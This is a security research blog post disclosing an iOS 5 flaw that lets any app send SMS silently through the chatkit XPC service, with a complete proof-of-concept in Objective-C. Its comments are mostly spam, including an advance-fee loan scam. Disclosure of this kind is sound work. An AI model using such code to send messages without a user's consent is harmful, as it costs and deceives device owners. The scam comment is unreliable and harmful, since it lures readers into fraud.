Pages

Wednesday, October 24, 2012

Your Flashlight Can Send SMS — One More Reason to Update up to iOS 6

Today I'm not going to tell you how the security system of iOS 5 is organized. We will not gather bits of information using undocumented features either. We'll just send an SMS from an application behind the user's back.

There is too little information describing low-level operations on iOS. These bits do not allow viewing the picture as a whole. A lot of header files have closed sources. The majority of steps are taken blindly. MacOS X, the mobile platform ancestor, becomes the main experimental field.

One of the systems of inter-process communication in MacOS is XPC. This system layer has been developed for inter-process communication based on transfer of plist structures using libSystem and launchd. In fact, it is an interface that allows managing processes via the exchange of such structures as dictionary. Due to heredity, iOS 5 possesses this mechanism as well.

You might already understand what I mean by this introduction. Yep, there are system services in iOS that include tools for XPC communication. And I want to exemplify the work with daemon for SMS sending. However, it should be mentioned that the vulnerability is fixed in iOS 6, but is relevant for iOS 5.0—5.1.1. Jailbreak, Private Framework, and other illegal tools are not required for its exploitation. Only the set of header files from the directory /usr/include/xpc/* is needed.

One of the elements for SMS sending in iOS is the system service com.apple.chatkit, the tasks of which include generation, management, and sending of short text messages. For the ease of control, it has the publicly available communication port com.apple.chatkit.clientcomposeserver.xpc. Using the XPC subsystem, you can generate and send messages without user's approval. 

Well, let's try to create connection.
xpc_connection_t myconnection;
 
dispatch_queue_t queue = dispatch_queue_create("com.apple.chatkit.clientcomposeserver.xpc", DISPATCH_QUEUE_CONCURRENT);
 
myconnection = xpc_connection_create_mach_service("com.apple.chatkit.clientcomposeserver.xpc", queue, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
Now we have the XPC connection myconnection to the service of SMS sending. However, XPC configuration provides for creation of suspended connections —we need to take one more step for the activation.
xpc_connection_set_event_handler(myconnection, ^(xpc_object_t event){
        xpc_type_t xtype = xpc_get_type(event);
        if(XPC_TYPE_ERROR == xtype)
        {
        NSLog(@"XPC sandbox connection error: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
        }
        // Always set an event handler. More on this later.
        
        NSLog(@"Received an message event!");
        
    });

    xpc_connection_resume(myconnection);
The connection is activated. Right at this moment iOS 6 will display a message in the telephone log that this type of communication is forbidden. Now we need to generate a dictionary similar to xpc_dictionary with the data required for the message sending.
NSArray *receipements = [NSArray arrayWithObjects:@"+7 (90*) 000-00-00", nil];
    
NSData *ser_rec = [NSPropertyListSerialization dataWithPropertyList:receipements format:200 options:0 error:NULL];

xpc_object_t mydict = xpc_dictionary_create(0, 0, 0);
xpc_dictionary_set_int64(mydict, "message-type", 0);
xpc_dictionary_set_data(mydict, "recipients", [ser_rec bytes], [ser_rec length]);
xpc_dictionary_set_string(mydict, "text", "hello from your application!");

Little is left: send the message to the XPC port and make sure it is delivered.

xpc_connection_send_message(myconnection, mydict);
xpc_connection_send_barrier(myconnection, ^{
        NSLog(@"Message has been successfully delievered");
    });
Sound of SMS sent to a short number.
So prior to elimination of this vulnerability in iOS 6, any application could send SMS without user's approval. Apple has provided iOS 6 with one more security layer, which prevents connections to the service from a sandbox.

Thank you for attention!

Author: Kirill Ermakov, Positive Research.

9 comments:

  1. Hi this is the first time I have visited this. I want to ask you a question about this blog does what you describe mean that an application can "easily" send sms without the owner's knowledge? Some of my family members have iPhones and not all of them have updated to iOS 6 will applications still be able to send sms even though they still have iOS 5?

    Well that is how I understood your blog but I wanted to make sure?

    Besides my questions I think your blog is great (even though I have only read two of your blogs :P) and you are very good at explaining the problems with text and backing it up with the reasons behind these problems so great job, keep up the good work :)

    ReplyDelete
    Replies
    1. Hi, thanks! This ability works on all iOS 5 devices.
      As I told, it is fixed in iOS 6.

      Delete
  2. nice thought and nice blog dude,your idea awesome for explaining about sending msgs in i phone.so many soft ware related ideas you shared all da bst dude,
    SendBulk SMS text messages to India from your pc web or application you will got bulk pricing discounts Bulk sms provider
    sms Discounts

    ReplyDelete
  3. The majority of people like using hi-tech mobile phones which enables them to send and receive text and multimedia messages with ease. Perhaps, this is the reason why the smart marketing professionals try sending promotional messages to the masses, which help in lead generation, and earning better business opportunities effortlessly. Get more interesting information at http://www.smscastle.science/

    ReplyDelete
  4. Thank you regarding Wonderful and also Beneficial Post. This article is very is made up of lot more information regarding This particular Matter.Bulk Sms Providers

    ReplyDelete
  5. لا داعى للقلق وانت تتعامل مع شركة اركان المملكه للتنظيف والمكافحه والتسليك
    وغير ذالك من كافه انواع التنظيف فى المملكه السعوديه باكملها اذا
    كل ما عليكم هو زياره صفحتنا للتطلع على اقل الاسعار المتاحه
    والتى تفى احتياجاتكم الخاصه
    0544369605

    شركة كشف تسربات المياه بابها

    شركة تسليك مجارى بابها

    شركة مكافحة حشرات بابها

    شركة تنظيف بابها

    شركة تنظيف فلل بابها

    شركة تنظيف منازل بابها

    اتصلوا بنا دائما تجدونا فى كل وقت وكل مكان
    لاننا نتعامل بمنتهى الدقه والفعاله والاهميه الكبيره مع شركة
    اركان المملكه لاداعى للقلق نحن معك دائما

    ReplyDelete
  6. مع شركة اركان المملكه انت فى ايدى امينه لاننا بكل امان وحرفيه فى كافه المجالات الحديثه والعصريه
    شركة كشف تسربات المياه بجازان
    لدينا الخبره الكبيره فى مجال كشف التسربات اليوميه والتى من الافضل الاهتمام الكامل والشامل بها
    شركة نقل اثاث بجازان
    هكذا نحن معك دائما فى مجال التسليك والمكافحه فى كل وقت وكل مكان ندعمك بكل جهد
    شركة تسليك مجارى بجازان
    وايضا فى مدينه نجران لسنا الوحيدون ولكننا متميزون عن غيرنا فى كافه المجالات
    شركة تسليك مجارى بنجران
    ولدينا الخبره الطويله فى رش المبيدات والمكافحه بكل وقت وكل مكان
    شركة رش مبيدات بجازان
    ولدينا ايضا باع طويل فى المقاولات لاننا شركة متماسكه ولها الافضليه الكبيره فى هذا المجال
    شركة مقاولات بجازان
    نتعامل باقل الاسعار الممكنه والمتاحه لدى العميل والوصول الى الدقه الكامله

    ReplyDelete
  7. Sending SMS through iphone is a nice idea, but can we send Bulk SMS through it?

    ReplyDelete
  8. Best Place To Get A Solution To Your Financial Problems (Lexieloancompany@yahoo.com)!!!

    My Name is Nicole Marie, I live in USA and life is worth living comfortably for me and my family now and i really have never seen goodness shown to me this much in my life, As i am a struggling mum with two kids and i have been going through a serious problem as my husband encountered a terrible accident last two weeks, and the doctors stated that he needs to undergo a delicate surgery for him to be able to walk again and i could not afford the bills for his surgery then i went to the bank for a loan and they turn me down stating that i have no credit card, from there i ran to my father and he was not able to help me, then when i was browsing through yahoo answers i came across a God fearing man (Mr Martinez Lexie) who provides loans at an affordable interest rate and i have been hearing about so many scams on the Internet mostly Africa, but at this my desperate situation, i had no choice than to give it an attempt due to the fact that the company is from United State of America, and surprisingly it was all like a dream, i received a loan of $82,000.00 USD and i payed for my husband surgery and thank GOD today he is ok and can walk, my family is happy and i said to myself that i will shout to the world the wonders this great and God fearing Man Mr Martinez Lexie did for me and my family; so if anyone is in genuine and serious need of a loan do contact this GOD fearing man via Email: ( Lexieloancompany@yahoo.com ) or through the Company website: http://lexieloans.bravesites.com OR text: +18168926958 thanks


    ReplyDelete